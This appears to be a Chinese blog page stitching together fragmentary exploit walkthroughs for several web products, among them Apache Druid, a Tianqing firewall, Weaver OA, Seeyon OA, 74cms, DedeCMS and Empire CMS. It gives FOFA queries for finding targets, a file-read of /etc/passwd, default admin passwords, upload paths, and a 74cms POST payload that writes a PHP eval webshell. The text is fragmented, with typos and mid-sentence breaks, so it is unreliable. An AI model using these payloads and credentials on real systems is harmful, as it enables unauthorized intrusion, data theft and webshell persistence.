qq_52469895的博客

漏洞简介由于用户指定 HTTP InputSource 没有做出限制，可以通过将文件 URL 传递给 HTTPInputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下，构造恶意请求执行文件读取，最终造成服务器敏感性信息泄露。0x01 漏洞复现FOFA指纹:title="Apache Druid"1 在网站首页左上角点击Load data在点击在url处执行命令file:///etc/passwd0x02 漏洞POC和脚本

fofa语句：title="天清汉马USG防火墙"默认账号密码账号：useradmin密码：venus.user到后台后，进入管理员页面修改访问权限，即可使用该用户

fofa语句app="泛微-协同办公OA"SQL注入在泛微OA V8中的getdata.jsp文件里，通过gatData方法将数据获取并回显在页面上，而在getData方法中，判断请求里cmd参数是否为空，如果不为空，调用proc方法。其中它存在四个参数，分别为空字符串、cmd参数值、request对象以及serverContext对象，通过对cmd参数值进行判断，当cmd值等于getSelectAllId时，再从请求中获取sql和type两个参数值，并将参数传递进getSelectAllIds

打开网站任何测试它有没有未授权文件上传http://xxx/seeyon/thirdpartyController.do.css/…;/ajax.do通过抓取数据包，可以看到如下的数据请求和返回结构：返回状态404返回notfound然后直接poc这个jspx的马是在网上找到http://x.x.x.x/seeyon/autoinstall.do/..;/ajax.do?method=ajaxAction&managerName=formulaManage

下载好源码php网站源码下载_php招聘网站源码_php网站模版_骑士cms人才系统然后安装，安装好之后发送poc：http://127.0.0.1/74cms//index.php?m=home&a=assign_resume_tplPOST： variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n

首先我们要进入后台密码账号都是admin访问/dede/tpl.php?action=upload，审查源码，获取我们的token值。可以用taken值直接文件上传拿到token值后构造dede/tpl.php?filename=shell.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=c12bf4a8330732e9f45a492d54399803然后访问http:

首先去它的后台http://127.0.0.1/upload/e/admin/index.php账号密码root依次 -> [系统]-[系统设置]-[备份与恢复数据]-[备份数据]抓包把tablename改为phpifno()注意这里只勾选一个就行了然后点击备份开始抓包将tablename改为phpifno然后放包看到这里就是刚刚的数据查看备份说明然后将文件目录下的config.php,将readme.txt改为config.php